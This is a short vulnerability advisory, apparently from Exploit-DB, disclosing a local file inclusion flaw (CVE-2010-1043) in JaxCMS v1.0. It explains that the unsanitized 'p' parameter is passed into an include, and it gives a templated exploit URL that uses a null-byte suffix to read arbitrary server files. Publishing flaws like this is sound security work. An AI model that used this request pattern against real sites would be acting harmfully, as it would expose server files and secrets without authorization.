JaxCMS v1.0 Local File Include Vulnerability



EDB-ID: 11359 CVE: 2010-1043OSVDB-ID: 62161
Author: Hamza 'MizoZ' N.Published: 2010-02-08Verified: Verified
Exploit Code:   DownloadVulnerable App:    Download

Rating

(0.0)
Prev Home Next
/*
Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com<mailto:mizozx@gmail.com>
Greetz : Zuka !
*/
The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
So we can read any file in the server .
EXPLOIT :
http://server/[JaxCMS PATH]/index.php?p=[LFI]%00






Comments

No comments so far